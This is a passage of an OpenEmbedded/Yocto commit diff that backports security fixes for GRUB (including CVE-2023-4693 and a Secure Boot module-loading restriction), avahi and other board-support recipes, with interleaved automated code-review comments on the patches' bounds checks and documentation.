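+ if (read_attr
+ (at, pa + 0x10,
+ u32at (pa, 0x10) * (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR),
+--
+2.25.1
+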
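Review bot: In the second added check in `find_attr()` (the `@@ -240,6 +249,13 @@` hunk), `if (*pa != attr) break;` still dereferences `pa` before `(pa >= pa_end) || (pa_end - pa < 0x18)` is evaluated, so a `pa` at or past `pa_end` is read once before it is rejected. Whether the enclosing loop condition already keeps `pa` below `pa_end` cannot be seen here, because the loop header is outside the hunk; if it does not, the bounds test belongs above the `*pa` comparison. The literal `0x18` (the end of the 32-bit field at offset `0x14`) is repeated in both checks and would read better as a named constant or with a one-line comment saying what it covers.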
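--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4693.patch
@@ -0,0 +1,62 @@
+From 0ed2458cc4eff6d9a9199527e2a0b6d445802f94 Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:32:33 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB read when reading data from the resident
+ $DATA attribute
+
+When reading a file containing resident data, i.e., the file data is stored in
+the $DATA attribute within the NTFS file record, not in external clusters,
+there are no checks that this resident data actually fits the corresponding
+file record segment.
+
+When parsing a specially-crafted file system image, the current NTFS code will
+read the file data from an arbitrary, attacker-chosen memory offset and of
+arbitrary, attacker-chosen length.
+
+This allows an attacker to display arbitrary chunks of memory, which could
+contain sensitive information like password hashes or even plain-text,
+obfuscated passwords from BS EFI variables.
+
+This fix implements a check to ensure that resident data is read from the
+corresponding file record segment only.
+
+Fixes: CVE-2023-4693
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=0ed2458cc4eff6d9a9199527e2a0b6d445802f94]
+CVE: CVE-2023-4693
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 13 ++++++++++++-
+ 1 file changed, 12 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index c8d3683..4d1fe42 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -401,7 +401,18 @@ read_data (struct grub_ntfs_attr *at, grub_uint8_t *pa, grub_uint8_t *dest,
+ {
+ if (ofs + len > u32at (pa, 0x10))
+ return grub_error (GRUB_ERR_BAD_FS, "read out of range");
+- grub_memcpy (dest, pa + u32at (pa, 0x14) + ofs, len);
++
++ if (u32at (pa, 0x10) > (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute too large");
++
++ if (pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ if (u16at (pa, 0x14) + u32at (pa, 0x10) >
++ (grub_addr_t) at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR) - (grub_addr_t) pa)
++ return grub_error (GRUB_ERR_BAD_FS, "resident attribute out of range");
++
++ grub_memcpy (dest, pa + u16at (pa, 0x14) + ofs, len);
+ return 0;
+ }
+
+--
+2.25.1
+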
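Review bot: The new range checks in `read_data()` bound `pa` only from above (`pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR)`), so the last comparison computes `(grub_addr_t) at->mft->buf + size - (grub_addr_t) pa` on the assumption that `pa` is not below `at->mft->buf`. If `pa` can point into a different buffer, which cannot be determined from this hunk because the callers are outside it, that difference becomes large and the check passes. Adding the lower bound to the second test, `if (pa < at->mft->buf || pa >= at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR))`, closes that case. The buffer-size expression is also spelled out three times and could be held in one local.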
diff --git a/meta/recipes-bsp/grub/files/determinism.patch b/meta/recipes-bsp/grub/files/determinism.patch
index 3c1f562c71..bd4e7188ec 100644
--- a/meta/recipes-bsp/grub/files/determinism.patch
+++ b/meta/recipes-bsp/grub/files/determinism.patch
@@ -11,7 +11,7 @@ missing sorting of the list used to generate it. Add such a sort.
11Also ensure the generated unidata.c file is deterministic by sorting the 11Also ensure the generated unidata.c file is deterministic by sorting the
12keys of the dict. 12keys of the dict.
13 13
14Upstream-Status: Pending 14Upstream-Status: Submitted [https://lists.gnu.org/archive/html/grub-devel/2023-06/index.html]
15Richard Purdie <richard.purdie@linuxfoundation.org> 15Richard Purdie <richard.purdie@linuxfoundation.org>
16 16
17Index: grub-2.04/grub-core/genmoddep.awk 17Index: grub-2.04/grub-core/genmoddep.awk
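--- /dev/null
+++ b/meta/recipes-bsp/grub/files/font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch
@@ -0,0 +1,117 @@
+From 1f511ae054fe42dce7aedfbfe0f234fa1e0a7a3e Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 00:51:20 +0800
+Subject: [PATCH] font: Fix size overflow in grub_font_get_glyph_internal()
+
+The length of memory allocation and file read may overflow. This patch
+fixes the problem by using safemath macros.
+
+There is a lot of code repetition like "(x * y + 7) / 8". It is unsafe
+if overflow happens. This patch introduces grub_video_bitmap_calc_1bpp_bufsz().
+It is safe replacement for such code. It has safemath-like prototype.
+
+This patch also introduces grub_cast(value, pointer), it casts value to
+typeof(*pointer) then store the value to *pointer. It returns true when
+overflow occurs or false if there is no overflow. The semantics of arguments
+and return value are designed to be consistent with other safemath macros.
+
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c76ec09ae08155df27cd237eaea150b4f02f532]
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 17 +++++++++++++----
+ include/grub/bitmap.h | 18 ++++++++++++++++++
+ include/grub/safemath.h | 2 ++
+ 3 files changed, 33 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index 5edb477..df17dba 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -733,7 +733,8 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ grub_int16_t xoff;
+ grub_int16_t yoff;
+ grub_int16_t dwidth;
+- int len;
++ grub_ssize_t len;
++ grub_size_t sz;
+
+ if (index_entry->glyph)
+ /* Return cached glyph. */
+@@ -760,9 +761,17 @@ grub_font_get_glyph_internal (grub_font_t font, grub_uint32_t code)
+ return 0;
+ }
+
+- len = (width * height + 7) / 8;
+- glyph = grub_malloc (sizeof (struct grub_font_glyph) + len);
+- if (!glyph)
++ /* Calculate real struct size of current glyph. */
++ if (grub_video_bitmap_calc_1bpp_bufsz (width, height, &len) ||
++ grub_add (sizeof (struct grub_font_glyph), len, &sz))
++ {
++ remove_font (font);
++ return 0;
++ }
++
++ /* Allocate and initialize the glyph struct. */
++ glyph = grub_malloc (sz);
++ if (glyph == NULL)
+ {
+ remove_font (font);
+ return 0;
+diff --git a/include/grub/bitmap.h b/include/grub/bitmap.h
+index 5728f8c..0d9603f 100644
+--- a/include/grub/bitmap.h
++++ b/include/grub/bitmap.h
+@@ -23,6 +23,7 @@
+ #include <grub/symbol.h>
+ #include <grub/types.h>
+ #include <grub/video.h>
++#include <grub/safemath.h>
+
+ struct grub_video_bitmap
+ {
+@@ -79,6 +80,23 @@ grub_video_bitmap_get_height (struct grub_video_bitmap *bitmap)
+ return bitmap->mode_info.height;
+ }
+
++/*
++ * Calculate and store the size of data buffer of 1bit bitmap in result.
++ * Equivalent to "*result = (width * height + 7) / 8" if no overflow occurs.
++ * Return true when overflow occurs or false if there is no overflow.
++ * This function is intentionally implemented as a macro instead of
++ * an inline function. Although a bit awkward, it preserves data types for
++ * safemath macros and reduces macro side effects as much as possible.
++ *
++ * XXX: Will report false overflow if width * height > UINT64_MAX.
++ */
++#define grub_video_bitmap_calc_1bpp_bufsz(width, height, result) \
++({ \
++ grub_uint64_t _bitmap_pixels; \
++ grub_mul ((width), (height), &_bitmap_pixels) ? 1 : \
++ grub_cast (_bitmap_pixels / GRUB_CHAR_BIT + !!(_bitmap_pixels % GRUB_CHAR_BIT), (result)); \
++})
++
+ void EXPORT_FUNC (grub_video_bitmap_get_mode_info) (struct grub_video_bitmap *bitmap,
+ struct grub_video_mode_info *mode_info);
+
+diff --git a/include/grub/safemath.h b/include/grub/safemath.h
+index c17b89b..bb0f826 100644
+--- a/include/grub/safemath.h
++++ b/include/grub/safemath.h
+@@ -30,6 +30,8 @@
+ #define grub_sub(a, b, res) __builtin_sub_overflow(a, b, res)
+ #define grub_mul(a, b, res) __builtin_mul_overflow(a, b, res)
+
++#define grub_cast(a, res) grub_add ((a), 0, (res))
++
+ #else
+ #error gcc 5.1 or newer or clang 3.8 or newer is required
+ #endif
+--
+2.25.1
+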
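Review bot: `grub_cast` is added to include/grub/safemath.h as `grub_add ((a), 0, (res))` with no comment, so its contract is recorded only in the patch description. I would document it at the definition, for example `/* Store a in *res; evaluates to true if a does not fit in the type of *res. */`, matching the wording used for `grub_video_bitmap_calc_1bpp_bufsz` in bitmap.h. In `grub_font_get_glyph_internal()` `len` changes from `int` to `grub_ssize_t` while `sz` is `grub_size_t`; the later uses of `len` are outside the hunk, so it is worth confirming that the read-length comparison there still uses matching signedness.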
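--- /dev/null
+++ b/meta/recipes-bsp/grub/files/no-insmod-on-sb.patch
@@ -0,0 +1,107 @@
+From b5a6aa7d77439bfeb75f200abffe15c6f685c907 Mon Sep 17 00:00:00 2001
+From: Matthew Garrett <mjg@redhat.com>
+Date: Mon, 13 Jan 2014 12:13:09 +0000
+Subject: Don't permit loading modules on UEFI secure boot
+
+Author: Colin Watson <cjwatson@ubuntu.com>
+Origin: vendor, http://pkgs.fedoraproject.org/cgit/grub2.git/tree/grub-2.00-no-insmod-on-sb.patch
+Forwarded: no
+Last-Update: 2013-12-25
+
+Patch-Name: no-insmod-on-sb.patch
+
+Upstream-Status: Inappropriate [other, https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch]
+
+Backport of a Debian (and Fedora) patch implementing a way to get secure boot status
+for CVE-2020-14372_4.patch. The upstream solution has too many dependencies to backport.
+Source: https://salsa.debian.org/grub-team/grub/-/blob/debian/2.04-20/debian/patches/no-insmod-on-sb.patch
+
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/dl.c | 13 +++++++++++++
+ grub-core/kern/efi/efi.c | 28 ++++++++++++++++++++++++++++
+ include/grub/efi/efi.h | 1 +
+ 3 files changed, 42 insertions(+)
+
+diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
+index 48eb5e7b6..074dfc3c6 100644
+--- a/grub-core/kern/dl.c
++++ b/grub-core/kern/dl.c
+@@ -38,6 +38,10 @@
+ #define GRUB_MODULES_MACHINE_READONLY
+ #endif
+
++#ifdef GRUB_MACHINE_EFI
++#include <grub/efi/efi.h>
++#endif
++
+
+
+ #pragma GCC diagnostic ignored "-Wcast-align"
+@@ -686,6 +690,15 @@ grub_dl_load_file (const char *filename)
+ void *core = 0;
+ grub_dl_t mod = 0;
+
++#ifdef GRUB_MACHINE_EFI
++ if (grub_efi_secure_boot ())
++ {
++ grub_error (GRUB_ERR_ACCESS_DENIED,
++ "Secure Boot forbids loading module from %s", filename);
++ return 0;
++ }
++#endif
++
+ grub_boot_time ("Loading module %s", filename);
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_GRUB_MODULE);
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6e1ceb905..96204e39b 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -273,6 +273,34 @@ grub_efi_get_variable (const char *var, const grub_efi_guid_t *guid,
+ return NULL;
+ }
+
++grub_efi_boolean_t
++grub_efi_secure_boot (void)
++{
++ grub_efi_guid_t efi_var_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_size_t datasize;
++ char *secure_boot = NULL;
++ char *setup_mode = NULL;
++ grub_efi_boolean_t ret = 0;
++
++ secure_boot = grub_efi_get_variable ("SecureBoot", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !secure_boot)
++ goto out;
++
++ setup_mode = grub_efi_get_variable ("SetupMode", &efi_var_guid, &datasize);
++
++ if (datasize != 1 || !setup_mode)
++ goto out;
++
++ if (*secure_boot && !*setup_mode)
++ ret = 1;
++
++ out:
++ grub_free (secure_boot);
++ grub_free (setup_mode);
++ return ret;
++}
++
+ #pragma GCC diagnostic ignored "-Wcast-align"
+
+ /* Search the mods section from the PE32/PE32+ image. This code uses
+diff --git a/include/grub/efi/efi.h b/include/grub/efi/efi.h
+index e90e00dc4..a237952b3 100644
+--- a/include/grub/efi/efi.h
++++ b/include/grub/efi/efi.h
+@@ -82,6 +82,7 @@ EXPORT_FUNC (grub_efi_set_variable) (const char *var,
+ const grub_efi_guid_t *guid,
+ void *data,
+ grub_size_t datasize);
++grub_efi_boolean_t EXPORT_FUNC (grub_efi_secure_boot) (void);
+ int
+ EXPORT_FUNC (grub_efi_compare_device_paths) (const grub_efi_device_path_t *dp1,
+ const grub_efi_device_path_t *dp2);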
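Review bot: In `grub_efi_secure_boot()` the tests `if (datasize != 1 || !secure_boot)` and `if (datasize != 1 || !setup_mode)` read `datasize` before checking the returned pointer, and `datasize` is never initialised in this function. Whether `grub_efi_get_variable()` writes `*datasize` on failure is not visible in the hunk; if it does not, the comparison reads an indeterminate value. Declaring `grub_size_t datasize = 0;` and testing the pointer first, `if (!secure_boot || datasize != 1)`, avoids that. Every failure path also returns 0, so `grub_dl_load_file()` allows module loading whenever the variables cannot be read; a comment stating that this fail-open result is intended would help the next reader.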
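--- a/meta/recipes-bsp/grub/grub2.inc
+++ b/meta/recipes-bsp/grub/grub2.inc
@@ -13,6 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 
 CVE_PRODUCT = "grub2"
 
+# Applies only to RHEL
+CVE_CHECK_WHITELIST += "CVE-2019-14865"
+# Applies only to SUSE
+CVE_CHECK_WHITELIST += "CVE-2021-46705"
+
 SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
  file://0001-Disable-mfpmath-sse-as-well-when-SSE-is-disabled.patch \
  file://autogen.sh-exclude-pc.patch \
@@ -28,7 +33,85 @@ SRC_URI = "${GNU_MIRROR}/grub/grub-${PV}.tar.gz \
  file://CVE-2020-15706-script-Avoid-a-use-after-free-when-redefining-a-func.patch \
  file://CVE-2020-15707-linux-Fix-integer-overflows-in-initrd-size-handling.patch \
  file://determinism.patch \
-"
+ file://no-insmod-on-sb.patch \
+ file://CVE-2020-14372_1.patch \
+ file://CVE-2020-14372_2.patch \
+ file://CVE-2020-14372_3.patch \
+ file://CVE-2020-14372_4.patch \
+ file://CVE-2020-14372_5.patch \
+ file://CVE-2020-14372.patch \
+ file://CVE-2020-27779.patch \
+ file://CVE-2020-27779_2.patch \
+ file://CVE-2020-27779_3.patch \
+ file://CVE-2020-27779_4.patch \
+ file://CVE-2020-27779_5.patch \
+ file://CVE-2020-27779_6.patch \
+ file://CVE-2020-27779_7.patch \
+ file://CVE-2020-25632.patch \
+ file://CVE-2020-25647.patch \
+ file://0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch \
+ file://0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch \
+ file://0003-net-tftp-Fix-dangling-memory-pointer.patch \
+ file://0004-kern-parser-Fix-resource-leak-if-argc-0.patch \
+ file://0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch \
+ file://0006-kern-efi-Fix-memory-leak-on-failure.patch \
+ file://0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch \
+ file://0008-gnulib-regexec-Resolve-unused-variable.patch \
+ file://0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch \
+ file://0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch \
+ file://0011-gnulib-regexec-Fix-possible-null-dereference.patch \
+ file://0012-gnulib-regcomp-Fix-uninitialized-re_token.patch \
+ file://0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch \
+ file://0014-zstd-Initialize-seq_t-structure-fully.patch \
+ file://0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch \
+ file://0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch \
+ file://0017-disk-ldm-If-failed-then-free-vg-variable-too.patch \
+ file://0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch \
+ file://0019-disk-cryptodisk-Fix-potential-integer-overflow.patch \
+ file://0020-hfsplus-Check-that-the-volume-name-length-is-valid.patch \
+ file://0021-zfs-Fix-possible-negative-shift-operation.patch \
+ file://0022-zfs-Fix-resource-leaks-while-constructing-path.patch \
+ file://0023-zfs-Fix-possible-integer-overflows.patch \
+ file://0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch \
+ file://0025-affs-Fix-memory-leaks.patch \
+ file://0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch \
+ file://0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch \
+ file://0028-syslinux-Fix-memory-leak-while-parsing.patch \
+ file://0029-normal-completion-Fix-leaking-of-memory-when-process.patch \
+ file://0030-commands-hashsum-Fix-a-memory-leak.patch \
+ file://0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch \
+ file://0032-video-fb-fbfill-Fix-potential-integer-overflow.patch \
+ file://0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch \
+ file://0034-video-fb-video_fb-Fix-possible-integer-overflow.patch \
+ file://0035-video-readers-jpeg-Test-for-an-invalid-next-marker-r.patch \
+ file://0036-gfxmenu-gui_list-Remove-code-that-coverity-is-flaggi.patch \
+ file://0037-loader-bsd-Check-for-NULL-arg-up-front.patch \
+ file://0038-loader-xnu-Fix-memory-leak.patch \
+ file://0039-loader-xnu-Free-driverkey-data-when-an-error-is-dete.patch \
+ file://0040-loader-xnu-Check-if-pointer-is-NULL-before-using-it.patch \
+ file://0041-util-grub-install-Fix-NULL-pointer-dereferences.patch \
+ file://0042-util-grub-editenv-Fix-incorrect-casting-of-a-signed-.patch \
+ file://0043-util-glue-efi-Fix-incorrect-use-of-a-possibly-negati.patch \
+ file://0044-script-execute-Fix-NULL-dereference-in-grub_script_e.patch \
+ file://0045-commands-ls-Require-device_name-is-not-NULL-before-p.patch \
+ file://0046-script-execute-Avoid-crash-when-using-outside-a-func.patch \
+ file://CVE-2021-3981.patch \
+ file://CVE-2021-3695.patch \
+ file://CVE-2021-3696.patch \
+ file://CVE-2021-3697.patch \
+ file://CVE-2022-28733.patch \
+ file://CVE-2022-28734.patch \
+ file://CVE-2022-28736.patch \
+ file://CVE-2022-28735.patch \
+ file://font-Fix-size-overflow-in-grub_font_get_glyph_intern.patch \
+ file://CVE-2022-2601.patch \
+ file://CVE-2022-3775.patch \
+ file://CVE-2020-27749.patch \
+ file://CVE-2021-20225.patch \
+ file://CVE-2021-20233.patch \
+ file://CVE-2023-4692.patch \
+ file://CVE-2023-4693.patch \
+ "
 SRC_URI[md5sum] = "5ce674ca6b2612d8939b9e6abed32934"
 SRC_URI[sha256sum] = "f10c85ae3e204dbaec39ae22fa3c5e99f0665417e91c2cb49b7e5031658ba6ea"
 
@@ -47,6 +130,8 @@ GRUBPLATFORM ??= "pc"
 
 inherit autotools gettext texinfo pkgconfig
 
+CFLAGS_remove = "-O2"
+
 EXTRA_OECONF = "--with-platform=${GRUBPLATFORM} \
  --disable-grub-mkfont \
  --program-prefix="" \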
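Review bot: `CFLAGS_remove = "-O2"` in the last hunk has no comment, while the CVE_CHECK_WHITELIST lines added in the first hunk each say why they exist. Dropping the optimisation level for a bootloader build is the kind of change a later maintainer may revert as accidental, and on toolchains that tie `_FORTIFY_SOURCE` to optimisation it may also change which hardening flags take effect, so the reason belongs next to the line. I would add a comment above it such as `# <why -O2 is removed for grub; link the bug or commit that motivated it>`.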
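--- /dev/null
+++ b/meta/recipes-bsp/lrzsz/lrzsz-0.12.20/0001-Fix-cross-compilation-using-autoconf-detected-AR.patch
@@ -0,0 +1,36 @@
+From ecdcf0df6c28c65ca6d1e5638726e13e373c76c5 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Wed, 11 Nov 2020 22:58:55 -0800
+Subject: [PATCH] Fix cross compilation using autoconf detected AR
+
+currently its using 'ar' program from build host, which is not expected,
+we need to respect AR passed in environment
+
+Upstream-Status: Pending
+
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ configure.in | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/configure.in b/configure.in
+index 4ddbe8b..b7c3c31 100644
+--- a/configure.in
++++ b/configure.in
+@@ -84,6 +84,13 @@ AC_ARG_ENABLE(syslog,
+ ])
+
+ dnl Checks for programs.
++m4_ifndef([AC_PROG_AR],[dnl
++ AN_MAKEVAR([AR], [AC_PROG_AR])
++ AN_PROGRAM([ar], [AC_PROG_AR])
++ AC_DEFUN([AC_PROG_AR],
++ [AC_CHECK_TOOL(AR, ar, :)])
++])
++AC_PROG_AR
+ AC_PROG_CC
+ AC_PROG_GCC_TRADITIONAL
+ dnl AC_PROG_INSTALL included in AM_INIT_AUTOMAKE
+--
+2.29.2
+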
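--- a/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
+++ b/meta/recipes-bsp/lrzsz/lrzsz_0.12.20.bb
@@ -19,6 +19,7 @@ SRC_URI = "http://www.ohse.de/uwe/releases/lrzsz-${PV}.tar.gz \
  file://lrzsz-check-locale.h.patch \
  file://cve-2018-10195.patch \
  file://include.patch \
+ file://0001-Fix-cross-compilation-using-autoconf-detected-AR.patch \
  "
 
 SRC_URI[md5sum] = "b5ce6a74abc9b9eb2af94dffdfd372a4"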
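--- a/meta/recipes-bsp/opensbi/opensbi_0.6.bb
+++ b/meta/recipes-bsp/opensbi/opensbi_0.6.bb
@@ -1,5 +1,6 @@
 SUMMARY = "RISC-V Open Source Supervisor Binary Interface (OpenSBI)"
 DESCRIPTION = "OpenSBI aims to provide an open-source and extensible implementation of the RISC-V SBI specification for a platform specific firmware (M-mode) and a general purpose OS, hypervisor or bootloader (S-mode or HS-mode). OpenSBI implementation can be easily extended by RISC-V platform or System-on-Chip vendors to fit a particular hadware configuration."
+HOMEPAGE = "https://github.com/riscv/opensbi"
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://COPYING.BSD;md5=42dd9555eb177f35150cf9aa240b61e5"
 
@@ -8,7 +9,7 @@ require opensbi-payloads.inc
 inherit autotools-brokensep deploy
 
 SRCREV = "ac5e821d50be631f26274765a59bc1b444ffd862"
-SRC_URI = "git://github.com/riscv/opensbi.git \
+SRC_URI = "git://github.com/riscv/opensbi.git;branch=master;protocol=https \
  file://0001-Makefile-Don-t-specify-mabi-or-march.patch \
  "
 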
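--- a/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
+++ b/meta/recipes-bsp/pm-utils/pm-utils_1.4.1.bb
@@ -19,9 +19,12 @@ PACKAGECONFIG[manpages] = "--enable-doc, --disable-doc, libxslt-native xmlto-nat
 
 RDEPENDS_${PN} = "grep bash"
 
+EXTRA_OECONF = "--libdir=${nonarch_libdir}"
+
 do_configure_prepend () {
  ( cd ${S}; autoreconf -f -i -s )
 }
 
-FILES_${PN} += "${libdir}/${BPN}/*"
+FILES_${PN} += "${nonarch_libdir}/${BPN}/*"
 FILES_${PN}-dbg += "${datadir}/doc/pm-utils/README.debugging"
+FILES_${PN}-dev += "${nonarch_libdir}/pkgconfig/pm-utils.pc"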
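--- a/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
+++ b/meta/recipes-bsp/u-boot/libubootenv_0.3.1.bb
@@ -10,7 +10,7 @@ LICENSE = "LGPL-2.1"
 LIC_FILES_CHKSUM = "file://Licenses/lgpl-2.1.txt;md5=4fbd65380cdd255951079008b364516c"
 SECTION = "libs"
 
-SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https"
+SRC_URI = "git://github.com/sbabic/libubootenv;protocol=https;branch=master"
 SRCREV = "824551ac77bab1d0f7ae34d7a7c77b155240e754"
 
 S = "${WORKDIR}/git"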
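--- a/meta/recipes-bsp/u-boot/u-boot-common.inc
+++ b/meta/recipes-bsp/u-boot/u-boot-common.inc
@@ -14,13 +14,13 @@ PE = "1"
 # repo during parse
 SRCREV = "303f8fed261020c1cb7da32dad63b610bf6873dd"
 
-SRC_URI = "git://git.denx.de/u-boot.git \
+SRC_URI = "git://source.denx.de/u-boot/u-boot.git;protocol=https;branch=master \
  file://remove-redundant-yyloc-global.patch \
  file://CVE-2020-8432.patch \
  file://CVE-2020-10648-1.patch \
  file://CVE-2020-10648-2.patch \
  "
 
 S = "${WORKDIR}/git"
 B = "${WORKDIR}/build"
 do_configure[cleandirs] = "${B}"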
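--- a/meta/recipes-bsp/v86d/v86d_0.1.10.bb
+++ b/meta/recipes-bsp/v86d/v86d_0.1.10.bb
@@ -1,5 +1,6 @@
 SUMMARY = "User support binary for the uvesafb kernel module"
 HOMEPAGE = "https://tracker.debian.org/pkg/v86d"
+DESCRIPTION = "v86d provides a backend for kernel drivers that need to execute x86 BIOS code. The code is executed in a controlled environment and the results are passed back to the kernel via the netlink interface."
 
 # the copyright info is at the bottom of README, expect break
 LICENSE = "GPLv2"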
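--- a/meta/recipes-connectivity/avahi/avahi.inc
+++ b/meta/recipes-connectivity/avahi/avahi.inc
@@ -21,6 +21,16 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1 \
 
 SRC_URI = "https://github.com/lathiat/avahi/releases/download/v${PV}/avahi-${PV}.tar.gz \
  file://fix-CVE-2017-6519.patch \
+ file://CVE-2021-3468.patch \
+ file://CVE-2023-1981.patch \
+ file://CVE-2023-38469-1.patch \
+ file://CVE-2023-38469-2.patch \
+ file://CVE-2023-38470-1.patch \
+ file://CVE-2023-38470-2.patch \
+ file://CVE-2023-38471-1.patch \
+ file://CVE-2023-38471-2.patch \
+ file://CVE-2023-38472.patch \
+ file://CVE-2023-38473.patch \
  "
 
 UPSTREAM_CHECK_URI = "https://github.com/lathiat/avahi/releases/"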
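--- a/meta/recipes-connectivity/avahi/avahi_0.7.bb
+++ b/meta/recipes-connectivity/avahi/avahi_0.7.bb
@@ -8,6 +8,9 @@ SRC_URI += "file://00avahi-autoipd \
 
 inherit update-rc.d systemd useradd
 
+# Issue only affects Debian/SUSE, not us
+CVE_CHECK_WHITELIST += "CVE-2021-26720"
+
 PACKAGES =+ "libavahi-gobject avahi-daemon libavahi-common libavahi-core libavahi-client avahi-dnsconfd libavahi-glib avahi-autoipd avahi-utils"
 
 LICENSE_libavahi-gobject = "LGPLv2.1+"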
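--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2021-3468.patch
@@ -0,0 +1,42 @@
+From 447affe29991ee99c6b9732fc5f2c1048a611d3b Mon Sep 17 00:00:00 2001
+From: Riccardo Schirone <sirmy15@gmail.com>
+Date: Fri, 26 Mar 2021 11:50:24 +0100
+Subject: [PATCH] Avoid infinite-loop in avahi-daemon by handling HUP event in
+ client_work
+
+If a client fills the input buffer, client_work() disables the
+AVAHI_WATCH_IN event, thus preventing the function from executing the
+`read` syscall the next times it is called. However, if the client then
+terminates the connection, the socket file descriptor receives a HUP
+event, which is not handled, thus the kernel keeps marking the HUP event
+as occurring. While iterating over the file descriptors that triggered
+an event, the client file descriptor will keep having the HUP event and
+the client_work() function is always called with AVAHI_WATCH_HUP but
+without nothing being done, thus entering an infinite loop.
+
+See https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984938
+
+Upstream-Status: Backport
+CVE: CVE-2021-3468
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ avahi-daemon/simple-protocol.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/avahi-daemon/simple-protocol.c b/avahi-daemon/simple-protocol.c
+index 3e0ebb11..6c0274d6 100644
+--- a/avahi-daemon/simple-protocol.c
++++ b/avahi-daemon/simple-protocol.c
+@@ -424,6 +424,11 @@ static void client_work(AvahiWatch *watch, AVAHI_GCC_UNUSED int fd, AvahiWatchEv
+ }
+ }
+
++ if (events & AVAHI_WATCH_HUP) {
++ client_free(c);
++ return;
++ }
++
+ c->server->poll_api->watch_update(
+ watch,
+ (c->outbuf_length > 0 ? AVAHI_WATCH_OUT : 0) |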
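Review bot: The `Upstream-Status: Backport` line in this patch header carries no reference, unlike the other avahi patches added in this commit, which name both the tree they were imported from and the upstream commit. Without it, someone auditing the backport cannot confirm from the recipe that the five added lines in client_work() match what upstream shipped. If the hash on the `From` line is the upstream commit, the header could read `Upstream-Status: Backport [https://github.com/lathiat/avahi/commit/447affe29991ee99c6b9732fc5f2c1048a611d3b]`. client_work() starts and ends outside the hunk, so where the HUP branch sits relative to the read and write handling cannot be checked from here.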
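--- /dev/null
+++ b/meta/recipes-connectivity/avahi/files/CVE-2023-1981.patch
@@ -0,0 +1,60 @@
+Backport of:
+
+From a2696da2f2c50ac43b6c4903f72290d5c3fa9f6f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Petr=20Men=C5=A1=C3=ADk?= <pemensik@redhat.com>
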